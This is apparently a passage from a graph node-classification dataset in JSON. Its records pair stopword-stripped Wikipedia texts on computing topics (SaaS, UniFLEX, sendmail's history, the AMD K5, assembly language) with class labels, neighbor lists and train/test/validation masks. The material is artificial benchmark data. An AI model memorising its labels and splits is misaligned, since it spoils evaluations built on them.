factors accelerated feature delivery enabled agile software development methodologies methodologies evolved mid-1990s provide set software development tools practices support frequent software releases saas applications access company internal systems databases internal services predominantly offer integration protocols application programming interfaces apis operate wide area network typically protocols based http rest soap ubiquity saas applications internet services standardization api technology spawned development mashups lightweight applications combine data presentation functionality multiple services creating compound service mashups differentiate saas applications on-premises software latter easily integrated outside company firewall inspired success online social networks so-called web 2.0 functionality many saas applications offer features let users collaborate share information example many project management applications delivered saas model offer—in addition traditional project planning functionality—collaboration features letting users comment tasks plans share documents within outside organization several saas applications let users vote offer new feature ideas although collaboration-related functionality also integrated on-premises software implicit explicit collaboration users different customers possible centrally hosted software opensaas refers software service saas based open source code similar saas applications open saas web-based application hosted supported maintained service provider roadmap open saas applications defined community users upgrades product enhancements managed central provider term coined 2011 dries buytaert creator drupal content management framework andrew hoppin former chief information officer new york state senate vocal advocate opensaas government calling future government innovation points wordpress unified successful example opensaas software delivery model gives customers best worlds options fact open source means start building websites self-hosting wordpress customizing website heart ’ content concurrently fact wordpress saas means ’ manage website -- simply pay wordpress.com host drupal gardens free web hosting platform based open source drupal content management system offers another example forbes contributor dan woods calls new open source model saas according woods open source provides escape hatch drupal gardens users able press button get source code version drupal code runs site along data database take code put one hosting companies anything would like several important changes software market technology landscape facilitated acceptance growth saas solutions limitations slow acceptance saas prohibit used cases standard model also limitations engineering simulation software traditionally delivered on-premises solution user desktop ideal candidate saas delivery market saas engineering simulation software infancy interest concept growing similar reasons interest saas growing industries main driver traditional engineering simulation software required large up-front investment order access simulation software large investment kept engineering simulation inaccessible many startups middle market companies reluctant unable risk large software expenditure unproven projects according survey himss analytics 83 us healthcare organizations using cloud services 9.3 planning whereas 67 healthcare organizations currently running saas-based applications software service data escrow process keeping copy critical software-as-a-service application data independent third party similar source code escrow critical software source code stored independent third party saas data escrow applies logic data within saas application allows companies protect insure data resides within saas applications protecting data loss many varied reasons considering saas data escrow including concerns vendor bankruptcy unplanned service outages potential data loss corruption many businesses also keen ensure complying data governance standards want improved reporting business analytics saas data research conducted clearpace software ltd. growth saas showed 85 percent participants wanted take copy saas data third participants wanted copy daily basis one notable criticism saas comes richard stallman free software foundation refers service software substitute saass considers use saass violation principles free software according stallman saas products face problem 2010 forbes contributor dan woods noted drupal gardens web hosting platform based open source drupal content management system new open source model saas added similarly mediawiki wordpress many extensions increasingly used wide variety internal applications well public web services obtaining code relatively simple integration existing extensions plug-ins templates etc actual customizations rare usually quickly replaced standard publicly available extensions additionally guarantee software source code obtained means accurately reflects software system claims reflect andrew hoppin former chief information officer new york state senate refers combination saas open source software opensaas points wordpress another successful example opensaas software delivery model gives customers best worlds options fact open source means start building websites self-hosting wordpress customizing website heart ’ content concurrently fact wordpress saas means ’ manage website – simply pay wordpress.com host cloud saas model physical need indirect distribution distributed physically deployed almost instantaneously thereby negating need traditional partners middlemen",
    "neighbors": [
      1539,
      2052,
      10756,
      11268,
      3593,
      9228,
      526,
      3086,
      4623,
      530,
      10773,
      10262,
      1559,
      10265,
      9754,
      2075,
      3614,
      5662,
      5666,
      2084,
      549,
      9252,
      39,
      5159,
      7721,
      42,
      554,
      9766,
      9261,
      558,
      4142,
      9771,
      3121,
      3634,
      4659,
      5681,
      8756,
      3638,
      5689,
      5182,
      10820,
      6217,
      6729,
      4683,
      1612,
      590,
      79,
      1102,
      4176,
      5202,
      6737,
      7248,
      9806,
      3161,
      1628,
      4700,
      4704,
      4194,
      5732,
      4197,
      6246,
      8296,
      3690,
      7790,
      6259,
      8307,
      119,
      6265,
      2170,
      7802,
      10368,
      6785,
      8833,
      9347,
      9351,
      2696,
      10887,
      4236,
      8845,
      7822,
      10893,
      1680,
      3729,
      4760,
      4761,
      5784,
      5787,
      10392,
      5791,
      2720,
      10911,
      9378,
      6307,
      2217,
      170,
      2220,
      5295,
      1201,
      9906,
      7348,
      7352,
      10427,
      10942,
      4288,
      4289,
      4290,
      8387,
      3269,
      6341,
      8903,
      1224,
      6856,
      10952,
      5842,
      10454,
      5848,
      8412,
      7389,
      1759,
      6367,
      7393,
      8416,
      4327,
      6376,
      1259,
      2795,
      3819,
      750,
      11504,
      245,
      10486,
      3320,
      762,
      3323,
      5370,
      253,
      5371,
      7419,
      8191,
      8446,
      8451,
      775,
      5384,
      265,
      8457,
      4363,
      8703,
      272,
      6929,
      7953,
      8976,
      4372,
      7447,
      2328,
      4377,
      794,
      2842,
      8986,
      11038,
      6431,
      7967,
      4388,
      8998,
      6444,
      10542,
      7983,
      2864,
      8495,
      7476,
      6454,
      11577,
      10555,
      11070,
      5955,
      5956,
      7493,
      8515,
      9031,
      8520,
      11075,
      331,
      3405,
      4429,
      1362,
      2899,
      2901,
      3925,
      7512,
      7515,
      8539,
      2910,
      3935,
      2400,
      4958,
      3428,
      3433,
      10090,
      2923,
      7532,
      877,
      2926,
      8044,
      9584,
      1907,
      5491,
      6010,
      5499,
      8061,
      382,
      11646,
      5504,
      3969,
      6018,
      9601,
      2949,
      3462,
      8581,
      6027,
      911,
      1423,
      1935,
      8592,
      405,
      2965,
      1943,
      11159,
      5017,
      7066,
      2459,
      9632,
      3490,
      6563,
      8103,
      10152,
      9129,
      11687,
      6576,
      9137,
      1970,
      9650,
      9140,
      2486,
      4023,
      10681,
      8123,
      10687,
      448,
      2496,
      6080,
      8128,
      8644,
      9665,
      11201,
      1480,
      6089,
      970,
      9678,
      9682,
      8660,
      7637,
      10710,
      11221,
      10200,
      10713,
      6618,
      8666,
      6622,
      6111,
      6623,
      6632,
      1001,
      1004,
      7660,
      9708,
      10735,
      1008,
      1521,
      9713,
      2041,
      1021,
      2558,
      1023
    ],
    "mask": "Train"
  },
  {
    "node_id": 468,
    "label": 2,
    "text": "Hoard_memory_allocator:hoard memory allocator hoard memory allocator hoard memory allocator linux solaris microsoft windows operating systems hoard designed efficient used multithreaded applications multiprocessor computers hoard distributed gpl purchased proprietary software 2000 author emery berger benchmarked famous memory allocators stated hoard improves performance multithreaded applications providing fast scalable memory management functions malloc free particular reduces contention heap central data structure used dynamic memory allocation caused multiple threads allocate free memory avoids false sharing introduced memory allocators time hoard strict bounds fragmentation hoard continues maintained improved use number open source commercial projects also inspired changes memory allocators one os x since february 2008 first released mac os x snow leopard",
    "neighbors": [
      8545,
      6797,
      7983,
      823,
      3512,
      7802,
      731,
      9559
    ],
    "mask": "Test"
  },
  {
    "node_id": 469,
    "label": 5,
    "text": "Internet_chess_server:internet chess server internet chess server ics external server provides facility play discuss view board game chess internet term specifically refers facilities connecting players variety graphical chess clients located user computer 1970s one could play correspondence chess plato system program called 'chess3 several users used chess3 regularly often particular user would make several moves per day sometimes several games simultaneously progress theory one could use chess3 play complete game chess one sitting chess3 usually used way plato connected internet predecessor arpanet way allowed mass use public consequently chess3 still relatively unknown public eighties chess play email still fairly novel latency email less traditional correspondence chess via paper letters often one could complete dozen moves week network technology improved public widespread use centralised server live play became possibility michael moore university utah richard nash recognised potential internet chess server created first incarnation hosted lark.utah.edu accessible telnet official opening date ics january 15 1992 john chanak william kish aaron putnam moved server host machine carnegie mellon university july 1992 took operation although buggy suffered lag problems server popular among small group chess enthusiasts time many features added ics elo ratings support graphical clients server made stable late 1992 daniel sleator professor computer science carnegie mellon university took management ics addressed among issues frequent complaint players would lose blitz games time due network lag 1994 copyrighted code began receiving purchase offers companies wanting commercialise server questions whether sleator right claim ics intellectual property since code original server although made substantial improvements code march 1 1995 sleator announced intentions commercialise ics renaming internet chess club icc charging yearly membership fee us 49 us 59.95 2007 announcement highly controversial among existing members many volunteers contributed various ways flourishing ics upset anyone would attempt profit efforts active players server used service provided without charge pleased addition membership fee handful programmers worked original ics became unhappy saw commoditization project formed free internet chess server fics continued allow everyone access features free 1996 john fanning uncle napster founder shawn fanning started chess.net commercial internet chess server rival ics services remain operational today ics protocol simple text-based variant telnet protocol sparsely documented standardised although reference implementations several clients exist theory ics accessed telnet client however almost users choose play using graphical client called interface currently popular interface xboard windows counterpart winboard recent years however lost ground newer interfaces like pychess eboard xics x graphical interface internet chess server unlike earlier text-based ics clients xics allows players see board play pieces graphically usually 2-d configuration addition standalone clients many servers also offer java interfaces used directly web browser popular new users users public computers years several internet chess servers created popular chess.com chesshub.com lichess.org icc playchess.com fics chesscube chess also among games previously offered non-specialist site yahoo games",
    "neighbors": [
      11112,
      4490,
      6797,
      11002,
      735
    ],
    "mask": "Validation"
  },
  {
    "node_id": 470,
    "label": 2,
    "text": "UniFLEX:uniflex uniflex unix-like operating system developed technical systems consultants tsc motorola 6809 family allowed multitasking multiprocessing released dma-capable 8 floppy extended memory addressing hardware software controlled 4kib paging 768 kib ram motorola 6809 based computers examples included machines swtpc gimix goupil france swtpc machines uniflex also supported 20 mb 14 hard drive oem 'd century data systems 1979 later also supported larger 14 drives 80 mb 8 hard drives 5-1/4 floppies 1982 machines also supported first widely available 5-1/4 hard disks using st506 interface 5 mb basf 6182 removable syquest sq306rd capacity due limited address space 6809 64 kb hardware limitations main memory space uniflex kernel well running process smaller 56 kb code data processes could 64k minus 512 bytes achieved writing kernel user space code entirely assembly language removing classic unix features group permissions files otherwise uniflex similar unix version 7 though command names slightly different technical reason renaming apart achieving level command-level compatibility single-user sibling flex simply restoring unix style names considerable degree unix look feel could established though due memory limitations command line interpreter shell less capable bourne shell known unix version 7 memory management included swapping dedicated portion system disk even floppies whole processes could swapped individual pages caused swapping big hit system responsiveness memory sized appropriately however uniflex extremely memory-efficient operating system machines less megabyte ram serving dozen asynchronous terminals uncommon worked surprisingly well tsc never bundled c compiler uniflex 6809 though produced one early 1980s c language implementation became available 3rd party products mccosh introl compilers using c compiler could establish source-level compatibility unix version 7 i.e. number unix tools applications could ported uniflex size allowed unix pdp-11 limited executables 64 kb code another 64 kb data uniflex limitation approximately 56 kb code data together much application software available uniflex ports dynacalc spreadsheet stylograph word processor flex operating system existed copies sold mid 1980s successor version motorola 68000 announced though removed pressing space limitations commercially successful compete source-code ports original unix source code uniflex supporting software available internet netherlands uniflex users ported fair number unix utilities uniflex also modified kernel code give foreground processes preference background processes accessing disk gave major improvement user experience one tsc guys dan vanada later started company scintillex software .products i.e accessing utilities allowed transfer data uniflex ms-dos vice versa well dos format utilities code patch utility",
    "neighbors": [
      2179,
      6787,
      6412,
      5397,
      1304,
      3487,
      1952,
      2345,
      3241,
      9643,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      8262,
      5840,
      477,
      6369,
      9444,
      5492,
      2424,
      633,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 471,
    "label": 5,
    "text": "Delivermail:delivermail ancestor sendmail delivermail also eric allman mail transport agent used ftp protocol early arpanet transmit e-mail recipient 1979 delivermail first shipped 4.0bsd 4.1bsd arpanet still using ncp network protocol arpanet switched tcp/ip 1982 road paved mtas longer relied ftp delivery new protocol sending mail smtp dns replaced hosts files delivermail evolved sendmail",
    "neighbors": [
      2748,
      7364,
      2887,
      5063,
      10248,
      76,
      9452,
      5230,
      11500,
      5492,
      9909,
      4439,
      472,
      412
    ],
    "mask": "Validation"
  },
  {
    "node_id": 472,
    "label": 2,
    "text": "Eric_Allman:eric allman eric paul allman born september 2 1955 american computer programmer developed sendmail precursor delivermail late 1970s early 1980s uc berkeley 1998 allman greg olson co-founded company sendmail inc. born el cerrito california allman knew early age wanted work computing breaking high school mainframe later using uc berkeley computing center computing needs 1973 entered uc berkeley unix operating system began become popular academic circles earned b.s m.s degrees uc berkeley 1977 1980 respectively unix source code available berkeley local hackers quickly made many extensions code one extension delivermail 1981 turned sendmail mta designed deliver email still relatively small compared today internet arpanet consisted many smaller networks vastly differing formats e-mail headers sendmail soon became important part berkeley software distribution bsd used widely used mta unix based systems despite somewhat complex configuration syntax frequent abuse internet telemarketing firms 1998 allman greg olson founded sendmail inc. headquartered emeryville california proprietary work improving sendmail logging format used mta known syslog first used solely sendmail eventually became unofficial standard format used unrelated programs logging later format made official rfc 3164 2001 however original format made obsolete recent revision rfc 5424 allman credited popularizing allman indent style also known bsd indent style ported fortran version super star trek c programming language later became bsd trek still included various linux distributions part classic bsdgames package awarded telluride tech festival award technology august 2006 telluride colorado 2009 recognized distinguished engineer association computing machinery april 2014 inducted internet hall fame allman openly gay lives berkeley california marshall kirk mckusick partner 30 years married october 2013 mckusick lead developer bsd two first met graduate school",
    "neighbors": [
      6273,
      1125,
      8395,
      1484,
      5421,
      11659,
      6352,
      11155,
      5492,
      8373,
      9845,
      471,
      9909,
      4793,
      6780,
      9151
    ],
    "mask": "Validation"
  },
  {
    "node_id": 473,
    "label": 3,
    "text": "AMD_K5:amd k5 k5 amd first x86 processor developed entirely in-house introduced march 1996 primary competition intel pentium microprocessor k5 ambitious design closer pentium pro pentium regarding technical solutions internal architecture however final product closer pentium regarding performance although faster clock-for-clock compared pentium k5 based upon internal highly parallel 29k risc processor architecture x86 decoding front-end k5 offered good x86 compatibility in-house-developed test suite proved invaluable later projects models 4.3 million transistors five integer units could process instructions order one floating-point unit branch target buffer four times size pentium register renaming helped overcome register dependencies chip speculative execution instructions reduced pipeline stalls 16 kb four-way set-associative instruction cache 8 kb data cache floating-point divide square-root microcode mechanically proven floating-point transcendental instructions implemented hardware faithful true mathematical results operands k5 project represented early chance amd take technical leadership intel although chip addressed right design concepts actual engineering implementation issues low clock rates part due amd limitations cutting edge manufacturing company time part due design many levels logic process technology day hampering clock scaling additionally k5 floating-point performance regarded superior cyrix 6x86 slower pentium although offering reliable transcendental function results late market meet performance expectations k5 never gained acceptance among large computer manufacturers am486 amd k6 enjoyed two revisions k5 architecture internally called ssa/5 5k86 released k5 label original set ssa/5 cpus branch prediction unit disabled additional internal waitstates added issues remedied 5k86 resulting 30 better performance clock clock ssa/5 line ran 75 100 mhz 5k86 line ran 90 133 mhz however amd used called pr rating performance rating label chips according suggested equivalence integer performance pentium clock speed thus 116 mhz chip second line marketed k5 pr166 manufacturing delays caused pr200 arrival nearly align release k6 since amd want two chips competing k5-pr200 arrived small numbers",
    "neighbors": [
      3586,
      8322,
      5380,
      7173,
      9092,
      6151,
      8327,
      10375,
      6924,
      1677,
      398,
      3470,
      5645,
      6926,
      8851,
      7963,
      4252,
      2719,
      6815,
      5541,
      11047,
      2094,
      9911,
      6978,
      7234,
      4805,
      3911,
      11080,
      11083,
      2764,
      2638,
      8033,
      2791,
      1260,
      1005,
      5356,
      8815,
      1776,
      1137,
      9964,
      499,
      10734,
      2549,
      630,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 474,
    "label": 4,
    "text": "Certificate_policy:certificate policy certificate policy cp document aims state different entities public key infrastructure pki roles duties document published pki perimeter use x.509 certificates specific field set include link associated certificate policy thus exchange relying party access assurance level associated certificate decide level trust put certificate reference document writing certificate policy rfc proposes framework writing certificate policies certification practice statements cps points described based framework presented rfc document describe general architecture related pki present different entities pki exchange based certificates issued pki important point certificate policy description authorized prohibited certificate uses certificate issued stated attributes use cases intended fulfill example certificate issued digital signature e-mail aka s/mime encryption data authentication e.g web server one uses https issuance certificates delegation authority prohibited uses specified way document also describes certificates names chosen besides associated needs identification authentication certification application filled certification authority delegation registration authority charge checking information provided applicant identity make sure ca take part identity theft generation keys also mentioned certificate policy users may allowed generate keys submit ca generation associated certificate pki may also choose prohibit user-generated keys provide separated probably secure way generating keys example using hardware security module different procedures certificate application issuance acceptance renewal re-key modification revocation large part document procedures describe actor pki act order whole assurance level accepted chapter found regarding physical procedural controls audit logging procedures involved pki ensure data integrity availability confidentiality part describes technical requirements regarding key sizes protection private keys use key escrow various types controls regarding technical environment computers network lists vital part public key infrastructure specific chapter dedicated description management associated lists ensure consistency certificate status content list pki needs audited ensure complies rules stated documents certificate policy procedures used assess compliance described last chapter tackles remaining points example pki-associated legal matters",
    "neighbors": [
      513,
      517,
      1157,
      1288,
      9744,
      1297,
      1683,
      1688,
      3742,
      2083,
      8358,
      3629,
      11693,
      11569,
      9394,
      7736,
      5433,
      3776,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      5590,
      3805,
      7264,
      225,
      8674,
      7139,
      10341,
      5107,
      501,
      1526,
      2169,
      3707,
      510,
      4863
    ],
    "mask": "None"
  },
  {
    "node_id": 475,
    "label": 2,
    "text": "Lee_E._McMahon:lee e. mcmahon lee e. mcmahon 1931–1989 american computer scientist graduate st. louis university obtained ph.d. psychology harvard worked bell labs 1963 1989 best known contributions early versions unix operating system particular sed stream editor mcmahon contributed development comm qsort grep index cref cu datakit devised mcmahon system tournament",
    "neighbors": [
      9298,
      5492,
      9735
    ],
    "mask": "Test"
  },
  {
    "node_id": 476,
    "label": 9,
    "text": "Oscar_Nierstrasz:oscar nierstrasz oscar marius nierstrasz born professor computer science institute iam university berne specialist software engineering programming languages active field led software composition group university bern since 1994 date december 2011 cyberchair online submission reviewing system based oscar nierstrasz publication called identify champion described peer review process contributions scientific conferences using organizational pattern language nierstrasz co-authored several books object-oriented reengineering patterns pharo example editor journal object technology 2010 2013 succeeding founding editor richard wiener nierstrasz senior dahl–nygaard_prize 2013",
    "neighbors": [
      9701
    ],
    "mask": "None"
  },
  {
    "node_id": 477,
    "label": 9,
    "text": "Assembly_language:assembly language assembly language assembler language often abbreviated asm low-level programming language strong correspondence instructions language architecture machine code instructions assembly language may also called symbolic machine code assembly code converted executable machine code utility program referred assembler conversion process referred assembly assembling source code assembly language usually one statement per machine instruction 1:1 comments statements assembler directives macros symbolic labels program memory locations often also supported assembly language specific particular computer architecture sometimes operating system however assembly languages provide specific syntax operating system calls assembly languages used universally operating system language provides access real capabilities processor upon system call mechanisms ultimately rest contrast assembly languages high-level programming languages generally portable across multiple architectures require interpreting compiling much complicated task assembling assembly language uses mnemonic represent low-level machine instruction opcode typically also architectural register flag etc many operations require one operands order form complete instruction assemblers permit named constants registers labels program memory locations calculate expressions operands thus programmers freed tedious repetitive calculations assembler programs much readable machine code depending architecture elements may also combined specific instructions addressing modes using offsets data well fixed addresses many assemblers offer additional mechanisms facilitate program development control assembly process aid debugging assembler program creates object code translating combinations mnemonics syntax operations addressing modes numerical equivalents representation typically includes operation code opcode well control bits data assembler also calculates constant expressions resolves symbolic names memory locations entities use symbolic references key feature assemblers saving tedious calculations manual address updates program modifications assemblers also include macro facilities performing textual substitution – e.g. generate common short sequences instructions inline instead called subroutines assemblers may also able perform simple types instruction set-specific optimizations one concrete example may ubiquitous x86 assemblers various vendors able perform jump-instruction replacements long jumps replaced short relative jumps number passes request others may even simple rearrangement insertion instructions assemblers risc architectures help optimize sensible instruction scheduling exploit cpu pipeline efficiently possible like early programming languages fortran algol cobol lisp assemblers available since 1950s first generations text based computer interfaces however assemblers came first far simpler write compilers high-level languages mnemonic along addressing modes operands instruction translates rather directly numeric representations particular instruction without much context analysis also several classes translators semi automatic code generators properties similar assembly high level languages speedcode perhaps one better known examples may several assemblers different syntax particular cpu instruction set architecture instance instruction add memory data register x86-family processor might codice_1 original intel syntax whereas would written codice_2 syntax used gnu assembler despite different appearances different syntactic forms generally generate numeric machine code see single assembler may also different modes order support variations syntactic forms well exact semantic interpretations fasm-syntax tasm-syntax ideal mode etc. special case x86 assembly programming two types assemblers based many passes source needed many times assembler reads source produce object file cases assembler must able determine size instruction initial passes order calculate addresses subsequent symbols means size operation referring operand defined later depends type distance operand assembler make pessimistic estimate first encountering operation necessary pad one no-operation instructions later pass errata assembler peephole optimization addresses may recalculated passes allow replacing pessimistic code code tailored exact distance target original reason use one-pass assemblers speed assembly – often second pass would require rewinding rereading program source tape rereading deck cards punched paper tape later computers much larger memories especially disc storage space perform necessary processing without re-reading advantage multi-pass assembler absence errata makes linking process program load assembler directly produces executable code faster example following code snippet one-pass assembler would able determine address backward reference bkwd assembling statement s2 would able determine address forward reference fwd assembling branch statement s1 indeed fwd may undefined two-pass assembler would determine addresses pass 1 would known generating code pass 2 sophisticated high-level assemblers provide language abstractions see language design details program written assembly language consists series mnemonic processor instructions meta-statements known variously directives pseudo-instructions pseudo-ops comments data assembly language instructions usually consist opcode mnemonic followed list data arguments parameters translated assembler machine language instructions loaded memory executed example instruction tells x86/ia-32 processor move immediate 8-bit value register binary code instruction 10110 followed 3-bit identifier register use identifier al register 000 following machine code loads al register data 01100001 binary computer code made human-readable expressing hexadecimal follows codice_3 means 'move copy following value al codice_4 hexadecimal representation value 01100001 97 decimal assembly language 8086 family provides mnemonic mov abbreviation move instructions machine code written follows assembly language complete explanatory comment required semicolon much easier read remember mov al 61h load al 97 decimal 61 hex assembly languages including one mnemonic mov may used family related instructions loading copying moving data whether immediate values values registers memory locations pointed values registers immediate a/k/a direct addresses assemblers may use separate opcode mnemonics l move memory register st move register memory lr move register register mvi move immediate operand memory etc mnemonic used different instructions means mnemonic corresponds several different binary instruction codes excluding data e.g codice_5 example depending operands follow mnemonic example x86/ia-32 cpus intel assembly language syntax codice_6 represents instruction moves contents register ah register al hexadecimal form instruction first byte 88h identifies move byte-sized register either another register memory second byte e0h encoded three bit-fields specify operands registers source ah destination al case like mnemonic represent one binary instruction assembler determines instruction generate examining operands first example operand codice_5 valid hexadecimal numeric constant valid register name codice_3 instruction applicable second example operand codice_9 valid register name valid numeric constant hexadecimal decimal octal binary codice_10 instruction applicable assembly languages always designed sort unambiguousness universally enforced syntax example intel x86 assembly language hexadecimal constant must start numeral digit hexadecimal number equal decimal ten would written codice_11 codice_12 codice_9 specifically appear name register ah rule also prevents ambiguity names registers bh ch dh well user-defined symbol ends letter h otherwise contains characters hexadecimal digits word beach returning original example x86 opcode 10110000 codice_3 copies 8-bit value al register 10110001 codice_15 moves cl 10110010 codice_16 dl assembly language examples follow mov al 1h load al immediate value 1 mov cl 2h load cl immediate value 2 mov dl 3h load dl immediate value 3 syntax mov also complex following examples show mov eax ebx move 4 bytes memory address contained ebx eax mov esi+eax cl move contents cl byte address esi+eax mov ds dx move contents dx segment register ds case mov mnemonic translated directly one opcodes 88-8c 8e a0-a3 b0-bf c6 c7 assembler programmer normally know remember transforming assembly language machine code job assembler reverse least partially achieved disassembler unlike high-level languages one-to-one correspondence many simple assembly statements machine language instructions however cases assembler may provide pseudoinstructions essentially macros expand several machine language instructions provide commonly needed functionality example machine lacks branch greater equal instruction assembler may provide pseudoinstruction expands machine set less branch zero result set instruction full-featured assemblers also provide rich macro language discussed used vendors programmers generate complex code data sequences since information pseudoinstructions macros defined assembler environment present object program disassembler reconstruct macro pseudoinstruction invocations disassemble actual machine instructions assembler generated abstract assembly-language entities likewise since comments assembly language source file ignored assembler effect object code generates disassembler always completely unable recover source comments computer architecture machine language computers differ number type operations support different sizes numbers registers representations data storage general-purpose computers able carry essentially functionality ways differ corresponding assembly languages reflect differences multiple sets mnemonics assembly-language syntax may exist single instruction set typically instantiated different assembler programs cases popular one usually supplied cpu manufacturer used documentation two examples cpus two different sets mnemonics intel 8080 family intel 8086/8088 intel claimed copyright assembly language mnemonics page documentation published 1970s early 1980s least companies independently produced cpus compatible intel instruction sets invented mnemonics zilog z80 cpu enhancement intel 8080a supports 8080a instructions plus many zilog invented entirely new assembly language new instructions also 8080a instructions example intel uses mnemonics mov mvi lda sta lxi ldax stax lhld shld various data transfer instructions z80 assembly language uses mnemonic ld similar case nec v30 v20 cpus enhanced copies intel 8086 8088 respectively like zilog z80 nec invented new mnemonics 8086 8088 instructions avoid accusations infringement intel copyright questionable whether copyrights valid later cpu companies amd cyrix republished intel x86/ia-32 instruction mnemonics exactly neither permission legal penalty doubtful whether practice many people programmed v20 v30 actually wrote nec assembly language rather intel since two assembly languages instruction set architecture isomorphic somewhat like english pig latin requirement use manufacturer published assembly language manufacturer products large degree diversity way authors assemblers categorize statements nomenclature use particular describe anything machine mnemonic extended mnemonic pseudo-operation pseudo-op typical assembly language consists 3 types instruction statements used define program operations instructions statements assembly language generally simple unlike high-level languages generally mnemonic symbolic name single executable machine language instruction opcode least one opcode mnemonic defined machine language instruction instruction typically consists operation opcode plus zero operands instructions refer single value pair values operands immediate value coded instruction registers specified instruction implied addresses data located elsewhere storage determined underlying processor architecture assembler merely reflects architecture works extended mnemonics often used specify combination opcode specific operand e.g. system/360 assemblers use extended mnemonic mask 15 operation – nothing one step mask 0 extended mnemonics often used support specialized uses instructions often purposes obvious instruction name example many cpu explicit nop instruction instructions used purpose 8086 cpus instruction used pseudo-opcode encode instruction disassemblers recognize decode instruction similarly ibm assemblers system/360 system/370 use extended mnemonics zero masks sparc architecture known synthetic instructions assemblers also support simple built-in macro-instructions generate two machine instructions instance z80 assemblers instruction recognized generate followed sometimes known pseudo-opcodes mnemonics arbitrary symbols 1985 ieee published standard 694 uniform set mnemonics used assemblers standard since withdrawn instructions used define data elements hold data variables define type data length alignment data instructions also define whether data available outside programs programs assembled separately program data section defined assemblers classify pseudo-ops assembly directives also called pseudo-opcodes pseudo-operations pseudo-ops commands given assembler directing perform operations assembling instructions. directives affect assembler operates may affect object code symbol table listing file values internal assembler parameters sometimes term pseudo-opcode reserved directives generate object code generate data names pseudo-ops often start dot distinguish machine instructions pseudo-ops make assembly program dependent parameters input programmer one program assembled different ways perhaps different applications pseudo-op used manipulate presentation program make easier read maintain another common use pseudo-ops reserve storage areas run-time data optionally initialize contents known values symbolic assemblers let programmers associate arbitrary names labels symbols memory locations various constants usually every constant variable given name instructions reference locations name thus promoting self-documenting code executable code name subroutine associated entry point calls subroutine use name inside subroutines goto destinations given labels assemblers support local symbols lexically distinct normal symbols e.g. use 10 goto destination assemblers nasm provide flexible symbol management letting programmers manage different namespaces automatically calculate offsets within data structures assign labels refer literal values result simple computations performed assembler labels also used initialize constants variables relocatable addresses assembly languages like computer languages allow comments added program source code ignored assembly judicious commenting essential assembly language programs meaning purpose sequence binary machine instructions difficult determine raw uncommented assembly language generated compilers disassemblers quite difficult read changes must made many assemblers support predefined macros others support programmer-defined repeatedly re-definable macros involving sequences text lines variables constants embedded macro definition commonly mixture assembler statements e.g. directives symbolic machine instructions templates assembler statements sequence text lines may include opcodes directives macro defined name may used place mnemonic assembler processes statement replaces statement text lines associated macro processes existed source code file including assemblers expansion macros existing replacement text macros sense date ibm autocoders 1950s assembly language term macro represents comprehensive concept contexts c programming language define directive typically used create short single line macros assembler macro instructions like macros pl/i languages lengthy programs executed interpretation assembler assembly since macros 'short names expand several indeed many lines code used make assembly language programs appear far shorter requiring fewer lines source code higher level languages also used add higher levels structure assembly programs optionally introduce embedded debugging code via parameters similar features macro assemblers often allow macros take parameters assemblers include quite sophisticated macro languages incorporating high-level language elements optional parameters symbolic variables conditionals string manipulation arithmetic operations usable execution given macro allowing macros save context exchange information thus macro might generate numerous assembly language instructions data definitions based macro arguments could used generate record-style data structures unrolled loops example could generate entire algorithms based complex parameters instance sort macro could accept specification complex sort key generate code crafted specific key needing run-time tests would required general procedure interpreting specification organization using assembly language heavily extended using macro suite considered working higher-level language since programmers working computer lowest-level conceptual elements underlining point macros used implement early virtual machine snobol4 1967 written snobol implementation language sil assembly language virtual machine target machine would translate native code using macro assembler allowed high degree portability time macros used customize large scale software systems specific customers mainframe era also used customer personnel satisfy employers needs making specific versions manufacturer operating systems done example systems programmers working ibm conversational monitor system virtual machine vm/cms ibm real time transaction processing add-ons customer information control system cics acp/tpf airline/financial system began 1970s still runs many large computer reservation systems crs credit card systems today also possible use solely macro processing abilities assembler generate code written completely different languages example generate version program cobol using pure macro assembler program containing lines cobol code inside assembly time operators instructing assembler generate arbitrary code ibm os/360 uses macros perform system generation user specifies options coding series assembler macros assembling macros generates job stream build system including job control language utility control statements realized 1960s concept macro processing independent concept assembly former modern terms word processing text processing generating object code concept macro processing appeared appears c programming language supports preprocessor instructions set variables make conditional tests values note unlike certain previous macro processors inside assemblers c preprocessor turing-complete lacks ability either loop go latter allowing programs loop despite power macro processing fell disuse many high level languages major exceptions c c++ pl/i remaining perennial assemblers macro parameter substitution strictly name macro processing time value parameter textually substituted name famous class bugs resulting use parameter expression simple name macro writer expected name macro intention caller would provide name variable global variable constant b would used multiply foo called parameter codice_17 macro expansion codice_18 occurs avoid possible ambiguity users macro processors parenthesize formal parameters inside macro definitions callers parenthesize input parameters assemblers incorporated structured programming elements encode execution flow earliest example approach concept-14 macro set originally proposed dr. harlan mills march 1970 implemented marvin kessler ibm federal systems division extended s/360 macro assembler if/else/endif similar control flow blocks way reduce eliminate use goto operations assembly code one main factors causing spaghetti code assembly language approach widely accepted early '80s latter days large-scale assembly language use curious design a-natural stream-oriented assembler 8080/z80 processors whitesmiths ltd. developers unix-like idris operating system reported first commercial c compiler language classified assembler worked raw machine elements opcodes registers memory references incorporated expression syntax indicate execution order parentheses special symbols along block-oriented structured programming constructs controlled sequence generated instructions a-natural built object language c compiler rather hand-coding logical syntax fans little apparent demand sophisticated assemblers since decline large-scale assembly language development spite still developed applied cases resource constraints peculiarities target system architecture prevent effective use higher-level languages assemblers strong macro engine allow structured programming via macros switch macro provided masm32 package note code complete program assembly languages available time stored-program computer introduced kathleen booth credited inventing assembly language based theoretical work began 1947 working arc2 birkbeck university london following consultation then-future husband andrew booth john von neumann herman goldstine institute advanced study late 1948 electronic delay storage automatic calculator edsac assembler named initial orders integrated bootstrap program used one-letter mnemonics developed david wheeler credited ieee computer society creator first assembler reports edsac introduced term assembly process combining fields instruction word soap symbolic optimal assembly program assembly language ibm 650 computer written stan poley 1955 assembly languages eliminate much error-prone tedious time-consuming first-generation programming needed earliest computers freeing programmers tedium remembering numeric codes calculating addresses widely used sorts programming however 1980s 1990s microcomputers use largely supplanted higher-level languages search improved programming productivity today assembly language still used direct hardware manipulation access specialized processor instructions address critical performance issues typical uses device drivers low-level embedded systems real-time systems historically numerous programs written entirely assembly language burroughs mcp 1961 first computer operating system developed entirely assembly language written executive systems problem oriented language espol algol dialect many commercial applications written assembly language well including large amount ibm mainframe software written large corporations cobol fortran pl/i eventually displaced much work although number large organizations retained assembly-language application 